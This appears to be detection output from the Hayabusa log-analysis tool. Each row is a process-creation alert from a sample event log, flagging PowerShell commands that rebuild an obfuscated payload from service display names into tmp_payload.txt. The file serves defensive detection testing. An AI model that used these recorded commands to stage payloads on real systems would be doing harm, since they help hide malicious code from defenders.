2021-11-03 17:39:25.708 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:27.141 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:27.157 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:30.058 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:30.074 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:35.880 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:35.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:48.943 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:48.959 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:51.840 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:51.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:56.197 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:56.213 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
